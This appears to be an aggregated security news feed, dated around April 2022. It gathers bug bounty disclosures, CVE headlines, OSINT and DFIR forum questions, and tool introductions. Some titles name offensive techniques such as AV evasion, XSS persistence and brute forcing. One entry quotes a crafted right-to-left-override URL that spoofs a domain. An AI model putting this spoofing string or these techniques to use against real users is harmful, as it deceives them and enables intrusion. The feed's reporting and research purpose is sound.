    So I finally networked with one guy who works as a manager for a cyber security team. He is one of the best in my country, a geeky guy who is very familiar with pretty much everything. Under him he has many teams for mobile, IoT, web, and others. He told me that I should have solid knowledge of networks and web, and practise hacking challenges mainly on web penetration testing, and machines on HackTheBox. I asked him if I should focus on reverse engineering and exploit development. He told me many things on that: first is that it requires a lot of understanding of OS, architecture, and compiler theory; second is that there aren't many jobs in them except in hardware hacking and IoT. But if I want to practise reverse engineering challenges besides web, that is fine. The problem is that I feel …
  • Open

    How to create a Satellite Imagery Time-Lapse: Case Study of Myanmar & the South China Sea.
    A time-lapse is essentially multiple amounts of satellite images over a specific string of time whether that be over weeks or months or… Continue reading on Medium »
    War in Ukraine / April 15
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    OSINT in GitHub…
    Let’s take a look at the main data sources that are used when conducting OSINT research in the GitHub service: Continue reading on Medium »
    OSINT in Discord
    Today I’m going to break down the main sources of data I use when doing OSINT user profile research on Discord: Continue reading on Medium »
  • Open

    [https://shipit-sox-staging.shopifycloud.com] Presence of multiple vulnerabilities present in Ruby On Rails
    Shopify disclosed a bug submitted by beastglatisant: https://hackerone.com/reports/1400309 - Bounty: $500
    Account takeover leading to PII chained with stored XSS
    U.S. General Services Administration disclosed a bug submitted by hollaatm3: https://hackerone.com/reports/1483201
  • Open

    Any ideas what college students would love to see from a guest speaker?
    I work in DFIR, and I’ve been invited to talk to college students about my experience, the field, etc. Any good ideas of what I should include and make sure to talk about? submitted by /u/tfulab23 [link] [comments]
  • Open

    SecWiki News 2022-04-16 Review
    Compromising a university in half a day by ourren; A graph-query-based attack attribution method by ourren; Banli (板栗): high-risk asset identification and high-risk vulnerability scanning by ourren; The dilemma of SCA and the way forward by ourren. For more recent articles, visit SecWiki
  • Open

    Pandora Swap is launching a Bug Bounty Program
    Hi, Pandora Legion! We are very impressed and mesmerized by your love, support, and interactions. and we have a new announcement to make Continue reading on Medium »
    How I Hacked My School’s Students Portal to get access to any student’s details?
    Introduction Continue reading on Medium »
    HOW RECON HELPED ME TO GET A STORED XSS!
    RECONNAISSANCE IS THE KEY IN BUG BOUNTIES Continue reading on Medium »
    Linux User Controls
    What is Linux Continue reading on Medium »
    Port scanning and service discovery in 2022 — we have failed as a humanity
    There have been a lot of popular port scanning projects lately. In particular, these are projects that seek to combine fast port discovery… Continue reading on Medium »
    How we spoofed ENS domains for $15k
    TL;DR: We found a flaw that allowed us to spoof Ethereum domain names and received a $15k bounty. Continue reading on Medium »
    Change Any User Profile Details on Disney
    The Walt Disney Company started its program on Hackerone in March 2022. Continue reading on Medium »
    Creating Your Own Telegram Bot For Recon Bug Bounty
    Hello Friends this is my fourth blog regarding bug hunting Continue reading on Medium »
  • Open

    Kiterunner
    🔍 Introduction Kiterunner is a content-discovery tool made by Assetnote. Rather than being a typical tool that fuzzes or brute-forces a given location, it guesses the API specification using known Swagger Spec data and a data set compressed into its own schema, then sends known HTTP methods, headers, paths, parameters and so on to find API endpoints. Note that because Assetnote maintains wordlists that are updated periodically, the wordlist Kiterunner uses is not just a simple list but one based on data actually widely used on the web. Naturally this can produce faster and better results.
  • Open

    Industroyer2: The Worst Sequel
    submitted by /u/entropydaemon5 [link] [comments]
    GitHub: Security alert - Attack campaign involving stolen OAuth user tokens issued to two third-party integrators (Heroku and Travis CI)
    submitted by /u/DAMNIT_RENZO [link] [comments]
  • Open

    White-box analysis of the phpMyAdmin file inclusion vulnerability (from theory to practice)
    A white-box analysis of a mainstream MySQL connection framework, paired with notes from practical use, so that readers can put what they learn to use more quickly.
    Jumbo frames captured in a virtual lab!
    While capturing packets in my own virtualized lab, I noticed that the Length column in Wireshark was far larger than the MTU, even though the MTU of the capture interface was clearly 1500. Why is that?
    HackTheBox: the Overflow machine
    Preface: this is a hard machine that mainly tests web exploitation, reverse engineering, persistence, privilege escalation and other areas.
  • Open

    JekyllBot:5 A Security Vulnerability Affecting Hospital Robots [pdf]
    Article URL: https://assets.website-files.com/5d2ad783e06f4c19469d363a/625551dd440d0b187fa96d38_JekyllBot-5-Vulnerability-Disclosure-Report.pdf Comments URL: https://news.ycombinator.com/item?id=31048534 Points: 1 # Comments: 0
  • Open

    Resource Based Constrained Delegation
    A quick read on an attack path that can be leveraged to escalate network privileges and for lateral movement. Continue reading on Medium »

  • Open

    PYSA Ransomware Group Technical Analysis
    submitted by /u/wtfse [link] [comments]
    [Techmonitor.ai] Failed cyberattack on Ukraine's electricity grid could indicate Russia's growing willingness to attack critical infrastructure
    submitted by /u/NoStarchPress [link] [comments]
    New tool to exploit TURN servers - create a socks proxy into the internal network
    submitted by /u/FireFart [link] [comments]
    Multiple Vulnerabilities in Cisco Expressway
    submitted by /u/FireFart [link] [comments]
    Turncoat - Extract private messages from malware/phishing Telegram Bots
    submitted by /u/DoOrDieCalm [link] [comments]
    iViewed your API keys
    submitted by /u/Gallus [link] [comments]
  • Open

    Stored XSS, SQL, IDOR and Hall Of Fames
    Hello, today I am going to be writing about how I found stored XSS, reflected XSS, SQL and IDOR all within a software that was in scope… Continue reading on Medium »
    Mining Liquidity for Bug Bounty Contribution
    Hats Finance is excited to introduce Protocol Protection Mining starting in Q2 2022, allowing anyone in the ecosystem to become a… Continue reading on Medium »
  • Open

    A Detailed Guide on Medusa
    Hi Pentesters! Let’s learn about a different tool Medusa, which is intended to be a speedy, parallel and modular, login brute forcer. The goal of The post A Detailed Guide on Medusa appeared first on Hacking Articles.
  • Open

    Autopsy web cache understanding
    Hello everyone, I am a junior analyst and today I was doing forensics on a disk from one PC with Autopsy. I had some alerts of a user accessing some malicious website and running some sort of DoS attack. I checked browser history and could not find any log of opening that website (he could have removed it or opened it in a private window), but when I was doing forensics in Autopsy, in Web Cache I could find multiple web caches like this for example: URL: https://okay-website.com https://malicious-website.com URL: https://okay-website.com https://malicious-website.com https://malicious-website.com/target/blablabla For some of these, the domain was also pointing to https://malicious-website.com Now my question is, as I was not able to find that website even in Autopsy web history, nor did I find any downloads or anything else, is it possible that the user did not open a malicious website, but that okay-website.com did in the background? I am not sure if I understood 100% what the meaning of those web caches is. Now a few things to know: 1) Alerts that I got were at the exact same time as the user opened okay-website for the first time 2) In Web Cache I could see similar results for other domains that are linked to advertisements 3) With uBlock Origin I can see those ad URLs that it blocked, the very same as in Autopsy, but I can not see the malicious site. Cheers and thanks submitted by /u/facyber [link] [comments]
    How do Mobile Forensic tools work?
    Hi community… Commercially available tools like Cellebrite UFED in mobile forensics obtain deleted data by rooting the device… But how is it possible without installing Magisk and unlocking the bootloader? Even after the process the device doesn't show any trace of root. Any idea on the details of the tools? Thanks submitted by /u/Aromatic_Ideal_2933 [link] [comments]
  • Open

    Malware Lab / Analysis - Internet Connectivity - Analyzing Secondary Payloads?
    I have a question around malware labs and handling external communications. I've been building out a Malware analysis lab in VMWare with a REMnux VM and a Win10 machine. Obviously the machines should be isolated on their own internal network isolated from my primary workstation. So my question with this setup is, how do we analyze secondary payloads that may require a download from the internet if the VM's don't have a way of getting out? We can capture that the initial payload is attempting to reach out to a domain or IP to pull something down, but it won't be successful. Just curious if there's a safe way to workaround this, or if we don't really concern ourselves with actually grabbing the secondary payload from the web that it's trying to get? submitted by /u/IHadADreamIWasAMeme [link] [comments]
    Which Linux distribution would you recommend for use only as a quarantine?
    I want to create a virtual machine that I will use to download files that I think are malicious. A distribution without unnecessary applications would be great to be honest, but I could need some basic tools while opening the files. And I need a GUI too. Which distribution would you recommend to me? submitted by /u/Cpt_Winters [link] [comments]
    Building a vulnerability management dashboard
    So I am not a developer but I was asked to develop a dashboard for vulnerability management. I think of Nessus instantly. Is there an open source dashboard I can work with? I am very new at this. I will remove this post if it's the wrong subreddit to ask in. submitted by /u/light_striker12 [link] [comments]
    Career Shift
    Anyone here who is a former netsec engineer and now in the field of DevOps? How was the transition? Did you start again from scratch? submitted by /u/heisenboard [link] [comments]
    Anyone ever work for the NSA?
    I've been considering it for the future, because I'm going to school for cybersecurity right now and I have no clue if I want to work for the government, or do something else. What would you recommend? And what is working there like? Seriously thank you so so much if you answer this question because I have been looking everywhere and I haven't been able to find anyone who has worked/works there. :D submitted by /u/AQuestionableAgender [link] [comments]
  • Open

    War in Ukraine / April 14
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Exploring the Dark Web…
    Today I’m going to talk to you about tools for exploring the Dark Web. The list will be updated, as the topic is very diverse. Continue reading on Medium »
    IP address OSINT
    Today I want to discuss with you a number of sources that I use when conducting IP address OSINT research. Continue reading on Medium »
  • Open

    SecWiki News 2022-04-15 Review
    APTMalInsight: identifying and understanding APT malware using system call information and an ontology knowledge framework by ourren. For more recent articles, visit SecWiki
  • Open

    Corrupting the Source Docker Image
    submitted by /u/tbhaxor [link] [comments]
    Demystifying iOS Code Signature
    submitted by /u/dmchell [link] [comments]
  • Open

    SSE(Server Sent Event)
    🔍 Introduction SSE (Server-Sent Events) is a server push technology in which, much like WebSockets, the server and JavaScript communicate so that data can be received. Whereas WebSockets allow bidirectional communication, SSE only handles server→client traffic. When all you need is to receive pushes from the server, SSE can be the simplest technology to use. However, because it has more drawbacks than advantages in performance and technical terms, most services use WebSocket or Ajax instead. Event Stream Format Basic and content-type SSE uses the text/event-stream type and a plain text response.
  • Open

    Gaining Visibility Within Container Clusters
    Service mesh platforms can be used to provide insight into the container processes and their network operations within K8s clusters. The post Gaining Visibility Within Container Clusters appeared first on Unit42.
  • Open

    Design ideas behind the Digital China Internet-of-Vehicles challenge
    This article was provided by mldwyy of Gamma Lab (伽玛实验室); after the competition the design ideas and solution for this challenge are published for everyone to study and discuss.
    FreeBuf Morning Report | Microsoft disrupts the ZLoader botnet; more than 3.5 million Russian internet accounts compromised
    Russian hackers attempted to attack Ukraine's power grid with the Industroyer2 malware.
    Cisco fixes a high-severity authentication bypass vulnerability
    A high-severity vulnerability in Cisco Wireless LAN Controller software allows an attacker to bypass authentication controls.
    Introduction to ATT&CK v10 tactics: Resource Development
    In this installment we introduce the Resource Development tactic, one of the 14 ATT&CK tactics.
    From the perspective of telecom fraud, how do the stolen funds move?
    In recent years, as China's economy and society have rapidly gone digital, the structure of crime has fundamentally changed.
    New Enemybot DDoS botnet borrows attack code from Mirai and Gafgyt
    Recent research suggests that a threat group engaged in cryptomining and distributed denial-of-service (DDoS) attacks may be linked to a new botnet called Enemybot.
    CISA warns agencies to patch an actively exploited Windows LPE bug
    The Cybersecurity and Infrastructure Security Agency (CISA) has added 10 new security vulnerabilities to its list of actively exploited vulnerabilities.
    FreeBuf enterprise group discussion | Talking about enterprise asset security management
    In today's network environment, with highly digitized assets and ever more threats, the ever-larger asset base is also increasingly fragile, and keeping enterprise assets secure is a major challenge.
    Reproducing the DVRF lab
    In recent years, as vulnerabilities in all kinds of IoT devices have drawn more public attention, the harm caused by exploiting them has grown more serious.
    Emergency Chrome update fixes yet another zero-day
    Google has released Chrome 100.0.4896.127 to address a high-severity zero-day vulnerability exploited in the wild.
    The discovery process for Apache Dubbo CVE-2021-36162
    The discovery and analysis process for Apache Dubbo CVE-2021-36162.
    Who would have thought: are US nuclear facilities so old that it keeps them safe?
    Until three years ago, US nuclear systems were still using an IBM System 1 computer built in 1976; one line of thinking holds that because these systems are so old they are actually harder to compromise.
    US data breaches kept rising in Q1 2022, with "unknown" the largest attack vector
    The vast majority (92%) of data breaches recorded by the ITRC can be traced to cyberattacks, with phishing and ransomware the top two causes overall.
    Reproducing common framework vulnerabilities: Apache Struts2
    Reproduction and analysis of Struts 2 vulnerabilities
    Analysis of the Spring Cloud Gateway remote code execution vulnerability (CVE-2022-22947)
    Analysis of the Spring Cloud Gateway remote code execution vulnerability (CVE-2022-22947 share)

  • Open

    I Found My First Cross-site Scripting (XSS)
    Hello Hunters! In this short article I'll explain how I found my first (XSS) Continue reading on Medium »
    Bypass Rate Limit — A blank space leads to this random encounter!
    Hello All, Hope you are having a great time! Continue reading on InfoSec Write-ups »
    MY First Bug In Hackerone
    Hello My Dear Buggies!!! Continue reading on Medium »
    Subdomain Enumeration
    Open Source Intelligence gathering tool Continue reading on Medium »
  • Open

    Next step for exploit dev ?
    Good day everyone, So I’ve done a lot of the sources for beginners/intermediate for reversing and exploit dev. I’ve gone through sources users like u/PM_ME_YOUR_SHELLCODE have recommended, also did pwncollege which was really amazing. But now I wanna get into real world stuff and learn as I go. I wanna focus maybe on browser stuff but it’s really overwhelming and hard to find helpful resources. I’m asking to see if anyone here with experience has any pointers on what to start on and where to look (doesn’t necessarily have to be browsers, if anyone has interesting fields to get into I’d be happy to try new things). submitted by /u/Any-Presentation-679 [link] [comments]
    Will learning 6502 processor help me later in binary exploitation and reverse engineering?
    Hello, So basically I am a management of information technology graduate. I took basic OS and hardware courses in college. Currently I am doing an IT internship, and I am practising my hacking skills on HackTheBox (web and networks only). I am very passionate about reverse engineering, assembly, and binary exploitation. I plan that after I am comfortable enough with web application hacking I can then start doing some exploit development. I am good with solving basic crackmes and simple buffer overflows but that is it. I have a gap in the hardware area, then I discovered someone called Ben Eater on YouTube, and I ordered his kit to build a 6502 computer. I am doing this as a hobby first and foremost to know how computers work and interact with CPU and memory. But also so that later in my career I can comfortably understand stack, assembly, and kernel exploits on a deeper level. So is that good or did I just waste my money on the kit? submitted by /u/Ramseesthe4th [link] [comments]
  • Open

    Diving Deeper into WatchGuard Pre-Auth RCE - CVE-2022-26318
    submitted by /u/Mempodipper [link] [comments]
    Blinding Snort: Breaking the Modbus OT Preprocessor
    submitted by /u/derp6996 [link] [comments]
    CVE-2022-28345 - Signal client for iOS version 5.33.2 and below are vulnerable to RTLO Injection URI Spoofing using malicious URLs such as gepj.net/selif#/moc.elpmaxe which would appear as example.com/#files/ten.jpeg
    submitted by /u/docker-osx [link] [comments]
    VSTO enabled Office documents allow for remote .NET assembly remote code execution
    submitted by /u/DanielS-AL [link] [comments]
    Akamai Blog | Critical Remote Code Execution Vulnerabilities in Windows RPC Runtime
    submitted by /u/gquere [link] [comments]
    Extracting the hashed uninstall password for Cortex XDR being low privileged user
    submitted by /u/gid0rah [link] [comments]
    Microsoft Exposes Evasive Chinese Tarrask Malware Attacking Windows Computers. The Chinese-backed Hafnium hacking group has been linked to a piece of a new malware that's used to maintain persistence on compromised Windows environments.
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Read and write beyond bounds in mod_sed
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1511619 - Bounty: $4000
    [Bypass] Ability to invite a new member in sandbox Organization
    HackerOne disclosed a bug submitted by 0619: https://hackerone.com/reports/1486417 - Bounty: $2500
  • Open

    THE WORLD’S MOST COMPREHENSIVE OSINT TOOL CATALOG MORE THAN 600 TOOLS 2022.
    Waiting for the most expected OSINT service, analyzing more than 600 resources at a time, to be launched (more info here…).  We’re sharing… Continue reading on Medium »
    War in Ukraine / April 13
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Tools (OSINT) every security engineer should be aware of
    We will try to solve three questions in this blog. Let’s explore !! Continue reading on Medium »
    Searchlight — IMINT
    This room has OSINT challenges. In this room, we will be exploring the discipline of IMINT/GEOINT, which is short for Image intelligence… Continue reading on Medium »
    Google Dorks or Hack…
    Google Dorks or Hack is a technique for creating queries on the Google search engine to discover hidden information and vulnerabilities… Continue reading on Medium »
    Searching and Aggregating TOR/ONION Links
    While crawling and processing tons of pastes from public paste sites like Pastebin I recognized that people also use these sites to… Continue reading on Medium »
  • Open

    Process Doppelganging (Mitre:T1055.013)
    Introduction Eugene Kogan and Tal Liberman presented a technique for defense evasion called “Process Doppelganging” in Blackhat EU 2017 which can be found here and The post Process Doppelganging (Mitre:T1055.013) appeared first on Hacking Articles.
  • Open

    Listen to the rumble of dream cars (with videos)
    http://162.212.178.138:8080/cars test http://162.212.178.138:8080/don-games/ Android games http://162.212.178.138:8080/d3/Top10 of something http://162.212.178.138:8080/d4/Videos about China http://162.212.178.138:8080/china/ music videos from China http://162.212.178.138:8080/gsongs/ mp4 pop-rock music submitted by /u/Appropriate-You-6065 [link] [comments]
    Massive SWF archive
    https://locker.phinugamma.org/swf/ It has many SWF files from numerous sites like Armor Games, Addicting Games, Albino Black Sheep, The Best 404 Page Ever, Miniclip, and more. submitted by /u/JeffedCenaa2 [link] [comments]
  • Open

    Dependabot alerts now surface if your code is calling a vulnerability
    Article URL: https://github.blog/2022-04-14-dependabot-alerts-now-surface-if-code-is-calling-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31029253 Points: 2 # Comments: 0
    CVE-2021-1782, an iOS in-the-wild vulnerability in vouchers
    Article URL: https://googleprojectzero.blogspot.com/2022/04/cve-2021-1782-ios-in-wild-vulnerability.html Comments URL: https://news.ycombinator.com/item?id=31029245 Points: 1 # Comments: 0
    Preventing Cryptographic Failures: The No. 2 Vulnerability in the OWASP Top
    Article URL: https://www.synack.com/blog/preventing-cryptographic-failures-the-no-2-vulnerability-in-the-owasp-top-10/ Comments URL: https://news.ycombinator.com/item?id=31027891 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-04-14 Review
    Is ATT&CK becoming a security "metaverse"? by ourren; TP-Link-WDR-7660 security research: firmware analysis by ourren; Practice and exploration of knowledge graph visualization technology by ourren. For more of the latest articles, visit SecWiki
  • Open

    FreeBuf Weekly | Mirai malware is actively exploiting the Spring vulnerability; consumers are growing numb to data breaches
    A survey shows that consumers' trust in the organizations they do business with is at an all-time low, leading many to "give up" on security.
    Over the past year this giant has been fined a cumulative total of more than US$1 billion for data or privacy security issues
    For Internet companies, data is both a treasure and a headache; walking the tightrope between profit and protecting users' privacy, stumbles are inevitable.
    VulnHub target machine: DerpNStink-1
    7 - VulnHub target machine DerpNStink1
    Building a SIEM platform for a small organization with Elasticsearch SIEM
    Elasticsearch SIEM gives small and medium-sized enterprises a way to build their own SIEM. Its advantages include being open source, having a complete set of components, detailed documentation, and easy extensibility.
    Shellcode AV evasion: evasion with Go
    The Go language is optimized specifically for programming applications on multiprocessor systems; programs compiled with Go can match the speed of C or C++ code while being safer and supporting parallel processes.
    FreeBuf Morning Report | African banks become a major target of malware attacks; wind turbine giant Nordex hit by cyberattack
    German wind turbine manufacturer Nordex Group suffered a cyberattack on March 31, 2022; the company released an update this week.
    HackTheBox WeatherApp write-up: a classic SSRF + SQL injection case, code audit
    This challenge is of medium difficulty; without the source code it would be very hard to solve, and although one might think of SSRF, it would feel like a blind man feeling an elephant.
    PortSwigger: explaining WebSocket-based vulnerabilities
    PortSwigger study notes on WebSocket-based vulnerabilities.
    VMware CVE-2022-22954 vulnerability hits hard, patch immediately!
    Recently, researchers discovered a proof-of-concept exploit for the VMware remote code execution (RCE) vulnerability CVE-2022-22954.
    Elementor WordPress plugin has a vulnerability that may affect 500,000 sites
    The WordPress Elementor page builder plugin has a remote code execution vulnerability that may affect up to 500,000 websites.
    The CVE-2021-31805 RCE vulnerability in Apache Struts has finally been fixed
    The Apache Software Foundation urges organizations to address the vulnerability tracked as CVE-2021-31805.
    MIIT issues the "Industrial Internet Special Working Group 2022 Work Plan"
    The Plan calls for building an upgraded version of "5G + Industrial Internet": accelerating the construction of 5G fully connected factories, issuing guidance documents for their construction, and creating 10 benchmark 5G fully connected factories.
    Some thoughts on questions about the Spring Framework RCE (CVE-2022-22965)
    After the Spring RCE vulnerability had been exposed in the wild for some time, Spring officially published the vulnerability information on March 31; this article shares and answers some questions about this vulnerability.
  • Open

    Serialization&Deserialization Attacks
    No content preview
    Bypass Rate Limit — A blank space leads to this random encounter!
    No content preview
    BITB (browser in the browser)Attack
    No content preview
    Develop Bluetooth Apps | Fundamentals, Tools & Coding
    No content preview
  • Open

    BotNet probing private IP ranges?
    Good morning, Have a question for you all that I can't think through the answer. We exist in Azure GCC-H. Looking at my Sentinel threat dashboard, I see a list of "high confidence" botnet activity originating out of Russia, attempting to hit all of my VMs in Azure. Now, they are all private IP addresses, so what I am wondering is how is an external system not in my domain attempting to connect to a 10.X IP address inside my domain without being on a VPN? Is it just pointing its scan at my public gateway and going through the whole list of private IPs, hoping to be able to break through to one? submitted by /u/ToLayer7AndBeyond [link] [comments]
    VPN Host Checker - Asset Validation
    Morning. We’re currently setting up a new VPN environment and we’re thinking about asset validation. There are two options, checking for a machine PKI certificate or simply checking domain membership. Is it enough to simply check domain membership, and can’t that be faked in some way? submitted by /u/annonuk2020 [link] [comments]
    Question about network hardware devices (router,modems,and nic)
    I have a TP-Link router, an old Ethernet NIC card, and a modem that I want to understand more. Hello; I want to learn some hardware. I am fully aware of the OSI model and studied Network+ before and understand how NICs and routers are used. But can someone explain the components to me on a very low level? Attached is the hardware I have; if anyone can point me to a datasheet or something that explains each part (this is a capacitor, this is for volt resistance). Some parts I can identify but others not. If anyone can help that would be great cuz I want to understand them more. Here is the NIC: https://www.amazon.com/Realtek-RTL8139D-100Mbps-Ethernet-Adapter/dp/B000YJIJI2 The modem: https://archiwum.allegro.pl/oferta/modem-lucent-hv90p-t-warszawa-i7535730930.html I kept searching for anything that tells me each component on them but I can’t find any. Thanks submitted by /u/Ramseesthe4th [link] [comments]
  • Open

    Persisting XSS With IFrame Traps
    XSS Iframe Traps Longer Running XSS Payloads An issue with cross-site scripting (XSS) attacks is that our injected JavaScript might not run for an extended period of time. It may be a reflected XSS vulnerability where we’ve tricked our user into clicking a link, but when they land on the page where we were able... The post Persisting XSS With IFrame Traps appeared first on TrustedSec.
  • Open

    Make phishing great again. VSTO office files are the new macro nightmare?
    Intro to the Office VSTO format, a capability that provides rich capabilities for attackers to phish users and gain code execution Continue reading on Medium »
  • Open

    The Art of Memory Forensics
    I read somewhere that memory structures change with every iteration of Windows. With that said, does anyone know if The Art of Memory Forensics (2014) is still relevant? Thank you! submitted by /u/DeadBirdRugby [link] [comments]
    Is it possible to split pcap files into pieces?
    I have a big pcap file. I want to split it into chunks with data of the same size each (ex. 1000 packets each). submitted by /u/One-Ad2289 [link] [comments]
    iOS Backup Analysis with Open Source
    Hi community .. currently working on a project on analysing the iPhone backup data with open source tools … I’m working on iOS version 15.3 … I have taken unencrypted backup of passcode disabled … How can we analyse these type of files written in format ‘b5, 56, 20’ etc.. Any suggestions would be helpful… Thanks submitted by /u/Aromatic_Ideal_2933 [link] [comments]
  • Open

    Critical RCE Vulnerability in Elementor WordPress Plugin
    Security Risk: High Exploitation Level: Easy CVSS Score: 9.9 Vulnerability: Remote code execution (RCE) Patched Version: 3.6.3 On April 12th, an important security update was released for the Elementor plugin patching a critical remote code execution vulnerability which allows all authenticated users, including subscribers, to upload and execute arbitrary PHP code on a vulnerable website. This vulnerability, identified as CVE-2022-1329, is extremely severe. Continue reading Critical RCE Vulnerability in Elementor WordPress Plugin at Sucuri Blog.
    Sucuri WordPress Plugin += Sucuri WAF
    Sucuri has always been a dedicated supporter of the WordPress community. Our free plugin was one of our first contributions to WordPress security (before bootstrapping our efforts into our WAF/CDN, Backups, and Malware Remediation services). However, over my many years involved in web application security, I’ve found that one of the most evasive aspects of security for most business owners, enterprises, and agencies is visibility into security events impacting their websites. This includes monitoring who is logging in, knowing what changes are occurring in your site’s environment, and understanding what steps you can take to mitigate risk or react to a compromise. Continue reading Sucuri WordPress Plugin += Sucuri WAF at Sucuri Blog.
  • Open

    Digging Into Open Reporting
    As many readers of this blog are aware, I often find great value in open reporting, but that I also see the value in taking that open reporting a step (or three) further beyond where it exists now. In more than a few instances, something extra can be pulled from open reporting, something not presented or discussed in the article that can be of significant value to readers in domains such as DFIR, detection engineering, MSS/SOC monitoring, etc. As a result, I've spent a great deal of time during my career looking for alternate means for detecting activity (user, threat actor, malware) presented in open reporting, largely due to gaps in that reporting. For example, there's a great deal of open reporting that is based solely on RE and analysis of malware that is part of the final stage of the…

  • Open

    Reflected XSS on TikTok Website
    TikTok disclosed a bug submitted by homosec: https://hackerone.com/reports/1378413 - Bounty: $3000
    CSRF protection bypass in GitHub Enterprise management console
    GitHub disclosed a bug submitted by bitquark: https://hackerone.com/reports/1497169 - Bounty: $10000
    Stored XSS on the "www.intensedebate.com/extras-widgets" url at "Recent comments by" module with malicious blog url
    Automattic disclosed a bug submitted by superpan: https://hackerone.com/reports/1083734 - Bounty: $150
    Improper Implementation of SDK Allows Universal XSS in Webview Leading to Account Takeover
    EXNESS disclosed a bug submitted by holyfield: https://hackerone.com/reports/1455987 - Bounty: $300
    Ability to connect an external login service for unverified emails/accounts at accounts.shopify.com
    Shopify disclosed a bug submitted by saltymermaid: https://hackerone.com/reports/1018489 - Bounty: $1600
    CRLF Injection - Http Response Splitting
    EXNESS disclosed a bug submitted by socialcodia: https://hackerone.com/reports/1514359 - Bounty: $200
    Access control vulnerability (read/write)
    EXNESS disclosed a bug submitted by a_ashwarya: https://hackerone.com/reports/1174387 - Bounty: $1000
    Access control vulnerability (read/write)
    EXNESS disclosed a bug submitted by a_ashwarya: https://hackerone.com/reports/1174734 - Bounty: $2500
    Access control vulnerability (read-only)
    EXNESS disclosed a bug submitted by a_ashwarya: https://hackerone.com/reports/1159367 - Bounty: $2250
    Taking position in a discontinued forex pair without executing any trades
    EXNESS disclosed a bug submitted by a_ashwarya: https://hackerone.com/reports/1509211 - Bounty: $2337
    Open S3 Bucket Accessible by any User
    Omise disclosed a bug submitted by ravansurya: https://hackerone.com/reports/1474017 - Bounty: $100
  • Open

    Other than these, how to best mitigate a DDoS attack?
    Other than CloudFlare, blocking IP blocks on the network firewall and blocking on server's IPtables, what else can be effectively done to mitigate a DDoS attack? submitted by /u/arpegius55555 [link] [comments]
    is my Android screen being monitored?
    Okay here's the thing. I've recently observed that whenever I open my Instagram's vanish mode I see that line "you took a screenshot", and it's multiple and comes off like a blast, whereas I haven't taken any screenshots; my gallery is clear. And I've observed that my device is running slow after the recent software update. It's a Realme XT, running Android security patch of date March 5 2022; I usually limit background apps in dev options. I'm not a netsec student or a professional, but someone who is concerned about his privacy. I don't think anyone has any grudges on me. Is it a bug or is it spyware that I may have accidentally downloaded? Do help me. I may not respond to the comments for the next 6 hrs since I'm crashing to sleep after a whole day of studying. Ik this might be a low effort question, but I do apologise. I'm trying my best. I've seen my permissions including admin permissions on my phone and all seem normal. submitted by /u/0_lucifer_0 [link] [comments]
    how to know if I'd prefer offensive or defensive security?
    Hello. I am a support engineer, working on my Sec+ and hoping to get a cyber security job within a year or two. I can't make up my mind about whether I'd rather be blue team or red team. CTFs are very fun. Getting a flag or a reverse shell is a rush. But I'm not sure about actual pentesting. Trying to break into a black box system for 100 hours does not sound fun. Blue team sounds fun too. The hunt, trying to figure out how an incident happened and who did it. I also imagine it would be easier to work for startups or big companies later in my career (FAANG). I also like programming beyond scripting. Thoughts? submitted by /u/Throwaway_deafgrape [link] [comments]
    How to find interesting computers on a big network?
    Hello community! When auditing a large Windows network (like 300 computers), how do you figure out which computers may be of interest? It may be easy if computers are named meaningfully (ADM-something), but if that is not the case how can I figure out (for example) the computer used by a given user (admin, CEO, etc.)? Is it possible to get that information with a PowerShell AD query? Regards submitted by /u/fAyf5eQR [link] [comments]
    Trusted Remote Desktop Services (RDP) SSL Certificate
    Hi everyone. Our Cyber Security department told us to start deploying and using certificates to secure communication between RDP and WMI client and server. My question is related to the validity and renewal period. What should be configured and why? Thanks!! submitted by /u/plainas [link] [comments]
    Securing a password manager with 2FA makes no sense?
    Password managers like LastPass, Bitwarden, 1Password, etc. encourage the use of 2FA to add additional protection by using an authenticator/Yubikey. I strongly disagree, and I don't know why anyone would use 2FA to access their password managers. I travel around the world very much and frequently, also to very hostile countries in Africa, and have experienced muggings and armed robberies myself. It's not too uncommon to have all your belongings taken. I would recommend 2FA for individual websites, but for a password manager that contains ALL your passwords, including the ones to back up your 2FA, it is just nuts. Example: Imagine you are in Ukraine right now. All your passwords are stored in LastPass and you can only access it through your master password and Google Authenticator. The Russians come and take away everything. You have no phone, no computer, nothing. You manage to escape to Poland. You get hold of new devices and try to log in to LastPass. You can't, because you are missing the 2FA device. Ok, next step. Maybe use the backup codes. Dang, they are stored in LastPass as well. Ok, next try. Maybe ask Google for help to recover your account. They give you instructions and tell you to log in to your Google account or ask you to verify your email --> Nope, not possible, because those login details are saved there as well. You see where this is going? Losing your 2FA device is one of the worst things that could happen. It's an endless loop of not being able to log in/reset your devices. Now, even if I have a second phone with the 2FA codes stored in a secure location, that would also be useless if I am traveling on the other side of the world. If anyone has a solution / different approach to this, please enlighten me. submitted by /u/Hallowiegehtseuch [link] [comments]
    How to read pcap file with fields which we only want
    So I have this pcap file with various protocols involved, e.g.:
    udp: 12:47:22.002149 IP 226.180.77.184.2836 > 173.91.91.209.20208: UDP, length 147
    tcp: 12:47:22.000371 IP 149.144.16.81.80 > 173.91.91.2.52260: Flags [.], seq 1400:2800, ack 1, win 2049, options [nop,nop,TS val 869951533 ecr 3357690], length 1400: HTTP
    Let's say I need to find out the minimum and maximum bytes for packets. Now I need to only extract the length field from those packets. For easy analysis I can write this into text format (tcpdump's -w writes binary pcap, so the text output is redirected instead):
    tcpdump -n -r file.pcap > file.text
    If I need to only take the length field in UDP I can easily cut it like this:
    cat file.text | grep UDP | cut -f8 -d' '
    but this doesn't give valid output for TCP or any other protocol because the format is not the same. How to read a pcap file in the same format/fields? If I can take all the output in fields, the calculation can be easily done, e.g. | Time | src ip | destination ip | packet length |. Can tcpdump or tshark solve this problem? submitted by /u/lowiqstudent69 [link] [comments]
    Information Security freelance
    My sister is working at a small marketing business that creates video modules for big stores. They hire architects, engineers, etc. They had a recent incident wherein an architect used the company’s intellectual property to gain a client for himself. They fired the employee and filed a legal complaint. The small business wants to hire an IT Security consultant. As per the IT Security assessment, the company only uses Google Drive for storing their data. Any recommendation to prevent IP (Intellectual Property) theft? Do you suggest they subscribe to Google Workspace and configure a DLP solution? submitted by /u/girlQueso01 [link] [comments]
  • Open

